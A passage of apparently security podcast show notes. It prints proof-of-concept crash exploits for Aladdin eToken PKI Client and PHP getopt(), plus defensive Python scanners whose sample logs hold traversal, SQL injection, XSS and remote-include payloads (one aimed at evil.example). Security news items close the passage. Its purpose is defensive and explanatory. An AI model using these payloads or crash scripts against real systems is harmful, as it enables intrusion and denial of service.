          16. Aladdin eToken PKI Client is subject to a Virtual File Handling Unspecified Memory Corruption vulnerability. Version 4.5.52 is impacted, though others may be as well.  Exploit code is available:
            #!/usr/bin/perl -w
            # Summary: The eToken PKI Client is the software that enables eToken USB operation and the
            # implementation of eToken PKI-based solutions. These solutions include certificate-based
            # strong two-factor authentication, encryption and digital signing. With the PKI Client your
            # PKI solutions become highly secure, extremely convenient and portable, as you can easily and
            # securely generate and store PKI keys on-board eToken smart card-based devices.
            #
            # Vendor: Aladdin Knowledge Systems Ltd.
            # Product web page: http://www.aladdin.com
            #
            # Version tested: 4.5.52
            # Tested on Microsoft Windows XP Professional SP3 (EN)
            #
            #
            #
            # ===================================================================================
            #
            # (154c.a74): Access violation – code c0000005 (first chance)
            # First chance exceptions are reported before any exception handling.
            # This exception may be expected and handled.
            # eax=00000000 ebx=00000000 ecx=00000000 edx=01730002 esi=00000000 edi=0012fc90
            # eip=0045d3d3 esp=001282b0 ebp=00128304 iopl=0         nv up ei pl nz na po nc
            # cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
            # *** ERROR: Module load completed but symbols could not be loaded for etProps.exe
            # etProps+0x5d3d3:
            # 0045d3d3 8b8ea4000000    mov     ecx,dword ptr [esi+0A4h] ds:0023:000000a4=????????
            #
            # ===================================================================================
            #
            #
            #
            # Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
            #
            # Zero Science Lab – http://www.zeroscience.mk
            #
            # liquidworm gmail com

            $fajl = "Aladdin.etv"; # eToken Virtual file

            $djubre = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
            "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";

            # "or die" so that the die applies to open() rather than to the filename string
            open(etv, ">./$fajl") or die "\nCan't open $fajl: $!";
            print etv $djubre x 100;
            print "\n [o] Writing to file...\n";
            sleep 1;
            close etv;
            print "\n [o] File $fajl created.\n";

          17. PHP getopt() is subject to a Virtual File Handling Unspecified Memory Corruption vulnerability. Version 5.3.0 is impacted, though others may be as well.  Exploit code is available:
            <?php
            #####################################################################
            ## PHP 5.3.0 getopt() Denial of service
            ## Tested on WIN XP FR SP3, WIN VISTA FR SP2, Apache, PHP 5.3.0
            ## Denial of service
            ## Author: Napst3r
            ## Greets To: My Laptop &  all My Friends
            #####################################################################

            $buffer  = str_repeat('A:', 9999);
            $options = getopt($buffer);

            ?>

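The items above share a handful of request-side signatures: directory traversal with a trailing null byte in an include parameter (the Joomla LFI items), UNION-based SQL injection (items 6, 7, 10, 11, 14), a script tag reflected from a parameter (item 9), a remote URL handed to an include-path parameter (items 12 and 15), and an absurdly large numeric parameter (the vBulletin item 8). The following is an added example written for these notes, not code from the podcast or from any of the quoted advisories; it scans constructed access-log request lines for those indicators so a defender can triage logs, and adds a small check for the NUL-byte trick from item 13 on the response side. The `MAX_SANE_INT` cap and all host names are assumptions.

```python
"""Defensive indicator scan for the request patterns listed in the show notes.

Added example (not from the podcast or any quoted advisory). The log lines
below are constructed; hosts, paths and the MAX_SANE_INT cap are placeholders.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample of Apache/Nginx-style request lines (one per log entry).
SAMPLE_LOG = """\
GET /index.php?option=com_jprojectmanager&controller=../../../../../../etc/passwd%00 HTTP/1.1
GET /index.php?option=com_papers&task=details&sid=943/**/AND+1=2/**/UNION/**/SELECT+1,2,3 HTTP/1.1
GET /contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
GET /includes/hnmain.inc.php3?config[incdir]=http://evil.example/cmd.gif HTTP/1.1
GET /misc.php?show=latestposts&vsacb_resnr=10000000 HTTP/1.1
GET /index.php?option=com_content&view=article&id=42 HTTP/1.1
"""

MAX_SANE_INT = 10_000  # assumed cap for "how many rows" style parameters


def _is_traversal(v):
    # LFI: a climb out of the include directory, often ending in a NUL to cut off ".php"
    return "../" in v or "..\\" in v or "\x00" in v


def _is_sqli(v):
    # UNION-based injection; "/**/" is the comment-as-whitespace form used in item 6
    flat = re.sub(r"/\*.*?\*/", " ", v, flags=re.S).lower()
    return bool(re.search(r"\bunion\b.{0,40}\bselect\b", flat)) or " and 1=2" in flat


def _is_xss(v):
    return "<script" in v.lower()


def _is_rfi(v):
    # a full remote URL supplied where the application expects a local path
    return re.match(r"^(https?|ftp)://", v, re.I) is not None


def _is_oversized_int(v):
    return v.isdigit() and int(v) > MAX_SANE_INT


RULES = [("LFI", _is_traversal), ("SQLi", _is_sqli), ("XSS", _is_xss),
         ("RFI", _is_rfi), ("oversized-int", _is_oversized_int)]


def scan_request_line(line):
    """Return a sorted list of (indicator, parameter) hits for one 'METHOD path HTTP/x' line."""
    parts = line.split()
    if len(parts) < 2:
        return []
    query = urlsplit(parts[1]).query
    hits = set()
    for key, raw in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; the second unquote catches %2500-style double encoding
        value = unquote(raw)
        for name, pred in RULES:
            if pred(value):
                hits.add((name, key))
    return sorted(hits)


def scan_log(text):
    """Map 1-based line numbers to their hits; clean lines are omitted."""
    findings = {}
    for n, line in enumerate(text.splitlines(), 1):
        hits = scan_request_line(line)
        if hits:
            findings[n] = hits
    return findings


def first_nul_in_html(body):
    """Item 13: a NUL byte inside an HTML body makes some source viewers hide what follows.
    Return the offset of the first NUL in the body bytes, or -1 when there is none."""
    return body.find(b"\x00")


if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {hits}")
    print(first_nul_in_html(b"<html></html>\x00<script>x</script>"))
```

Run against a real log, the interesting output is the parameter name next to the indicator: a traversal string in `controller` or `view` is exactly the shape of the Joomla items above, and a rule hit on a parameter the application never uses for includes is a strong sign of automated scanning rather than a targeted attempt.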
          Stories of Interest:
          News item 1:  Scammers began distributing ransomware targeting BitTorrent users and claiming alleged piracy violations. The delivered ransomware dishes up an alarming alert message:

          Warning! Piracy detected!
          Pirated content was detected on your PC!

          The message goes on to state “Copyright fund has recieved report and has started an investigation. You’ll recieve subopena in a week”. (Misspellings are compliments of the attackers).  In an ironic twist, included in the message are copyright-infringing logos belonging to the RIAA, MPAA and others. The alert message leads to iccp-online.com, a now defunct scam site that claims to be “a  law firm which specialises in assisting intellectual property rights holders exploit and enforce their rights globally.”  The scam attempts to trick victims into paying “…damages, as well as a fine and procedural expenses”  to the tune of $399.85.

          News item 2: http://www.darkreading.com/database_security/security/attacks/showArticle.jhtml?articleID=224300052&cid=RSSfeed

          Hundreds of WordPress blogs were hacked during the past few weeks by attackers who pilfered blogger credentials stored in plain text in the database.

          The researchers who discovered the attacks say a design flaw in the WordPress blogging platform was the underlying problem because by default it allows users to set up permissions that let anyone read their blog’s wp-config.php file configuration files, and because WordPress stores the bloggers’ credentials in plain text.

          The attackers injected malicious iFrames into the blogs so that any visitors would automatically be infected with malware, including code that spreads fake antivirus software.

          WordPress, meanwhile, says it hasn’t seen any evidence that the attacks were related to a security problem with its software. Barry Abrahamson, systems wrangler for WordPress, says the attacks appear to have targeted weak file permissions. “File-level permissions and Web server security are the responsibility of the hosting environment, not the application,” Abrahamson says. “WordPress can be installed a number of ways, and many hosts have built custom installers. I am not sure how WordPress was installed in these cases.”

          If a blogger wants to check if his site was hacked, then he should look for extra HTML in the header and view the source for any iFrames pointing to http://mainnetsoll.com/grep or http://networkads.net/grep, he says. “They can [also] try installing the WordPress Exploit Scanner plug-in,” Abrahamson says. “The database scan portion of this plug-in should catch if a malicious iFrame code has been inserted into the options table in their database.”  Contact your hosting provider if you find either of these issues, he adds, and ensure you’re running WordPress 2.9.2. The good news is the attacks were not as malicious as they could have been.
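The two problems the story names, a world-readable wp-config.php and an injected iframe in the served page, can both be checked without the plug-in. The following is an added example written for these notes, not code from the article, from WordPress, or from the Exploit Scanner plug-in; the sample page and the temporary config file are constructed, and the two host names are the ones quoted in the story.

```python
"""Two defender checks for the WordPress story: file permissions on wp-config.php
and injected iframes in a served page. Added example; sample data is constructed."""
import os
import re
import stat
import tempfile
from urllib.parse import urlsplit

# The two hosts named in the story; any other iframe is judged by its own attributes.
SUSPECT_HOSTS = {"mainnetsoll.com", "networkads.net"}


def wp_config_exposure(path):
    """Return the permission problems that let other local users read or change
    wp-config.php, which holds the database credentials in clear text."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    problems = []
    if mode & stat.S_IROTH:
        problems.append("world-readable")
    if mode & stat.S_IWOTH:
        problems.append("world-writable")
    return problems


def demo_config_check():
    """Constructed demonstration: the same file checked at mode 0644 and then 0600."""
    with tempfile.NamedTemporaryFile("w", suffix="wp-config.php", delete=False) as fh:
        fh.write("<?php define('DB_PASSWORD', 'placeholder'); ?>\n")  # constructed content
        path = fh.name
    try:
        os.chmod(path, 0o644)
        lax = wp_config_exposure(path)
        os.chmod(path, 0o600)  # owner-only: the tightening most hosts recommend
        tight = wp_config_exposure(path)
    finally:
        os.unlink(path)
    return lax, tight


IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
HIDDEN_RE = re.compile(r"""display\s*:\s*none|\b(?:width|height)\s*=\s*["']?0\b""", re.I)


def injected_iframes(html):
    """Return (src, reason) for every iframe that points at a suspect host
    or is styled to be invisible, the usual shape of a drive-by injection."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = m.group(1)
        src_m = SRC_RE.search(attrs)
        src = src_m.group(1) if src_m else ""
        host = urlsplit(src).hostname or ""
        if host in SUSPECT_HOSTS:
            findings.append((src, "known-bad-host"))
        elif HIDDEN_RE.search(attrs):
            findings.append((src, "hidden-iframe"))
    return findings


# Constructed page: one injected iframe in the header, one legitimate embed in the body.
SAMPLE_PAGE = """<html><head><title>Blog</title>
<iframe src="http://mainnetsoll.com/grep" width=0 height=0 style="display:none"></iframe>
</head><body><p>post</p>
<iframe src="https://video.example/embed/123" width="560" height="315"></iframe>
</body></html>"""


if __name__ == "__main__":
    print(demo_config_check())
    print(injected_iframes(SAMPLE_PAGE))
```

The permission check deliberately reports only the "other" bits: on shared hosts the web server often runs under a group that legitimately needs read access, so group permissions are a hosting-specific question, while world-readable is wrong everywhere. The iframe check flags a hidden frame even when its host is unknown, because the next campaign will use a different domain.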

          News item 3: http://www.embedded.com/columns/breakpoint/224202612
          Governors and others frequently bemoan the lack of investment being made in crumbling infrastructure. Bridges, tunnels and the rest of the brick and mortar that enables our lives are in disrepair, and we’re told things are getting worse. Shrinking budgets ensure that repairs will continue to fall behind. Pundits also say the electric grid is old and not capable of meeting 21st century needs.

          Industrial automation equipment often runs for decades or longer. Years ago, when working on a system in a steel mill there was a huge motor stamped with a manufacturing date of 1899. It was still in service. The electronics, too, often runs for decades.

          That’s a testament to great engineering and manufacturing, and is also potentially a great hazard. These systems were largely designed before security became an important issue. Many have been almost haphazardly connected to the Internet in the intervening years, when management sees the ‘net as an easy way to monitor remotely and save money.

          In 2003 a worm shut down all safety monitoring on an Ohio nuke plant for five hours. Vancouver’s traffic lights have been compromised. A 14-year-old turned the Polish city of Lodz’s trams into his own giant train set, derailing four cars and injuring at least a dozen people.